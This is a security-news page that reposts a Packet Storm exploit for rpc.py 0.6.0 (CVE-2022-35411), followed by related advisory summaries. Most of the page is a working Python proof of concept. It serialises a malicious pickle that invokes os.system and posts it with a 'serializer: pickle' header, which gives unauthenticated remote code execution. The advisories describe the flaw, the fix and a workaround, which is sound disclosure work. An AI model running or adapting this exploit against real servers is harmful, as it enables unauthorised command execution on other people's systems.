Security
Headlines
HeadlinesLatestCVEs

Headline

rpc.py 0.6.0 Remote Code Execution

rpc.py version 0.6.0 suffers from a remote code execution vulnerability.

Packet Storm
Open in Source
#vulnerability#google#ubuntu#debian#git#rce#auth#zero_day
# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)# Google Dork: N/A# Date: 2022-07-12# Exploit Author: Elias Hohl# Vendor Homepage: https://github.com/abersheeran# Software Link: https://github.com/abersheeran/rpc.py# Version: v0.4.2 - v0.6.0# Tested on: Debian 11, Ubuntu 20.04# CVE : CVE-2022-35411import requestsimport pickle# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.pyHOST =3D "127.0.0.1:65432"URL =3D f"http://{HOST}/sayhi"HEADERS =3D {    "serializer": "pickle"}def generate_payload(cmd):    class PickleRce(object):        def __reduce__(self):            import os            return os.system, (cmd,)    payload =3D pickle.dumps(PickleRce())    print(payload)    return payloaddef exec_command(cmd):    payload =3D generate_payload(cmd)    requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)def main():    exec_command('curl http://127.0.0.1:4321')    # exec_command('uname -a')if __name__ =3D=3D "__main__":    main()

Related news

GHSA-8rq8-f485-7v8x: Deserialization of Untrusted Data in rpc.py

rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer: pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle. [Per the maintainer](https://github.com/abersheeran/rpc.py/issues/22), rpc.py is not designed for an API that is open to the outside world, and external requests cannot reach rpc.py in real world use. A [fix](https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd) exists on the `master` branch. As a workaround, use the following code to turn off pickle in older versions: ``` del SERIALIZER_NAMES[PickleSerializer.name] del SERIALIZER_TYPES[PickleSerializer.content_type]

CVE-2022-35411: Remote Code Execution 0-day in rpc.py - Elias Hohl - Medium

rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer: pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle.

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6
Packet Storm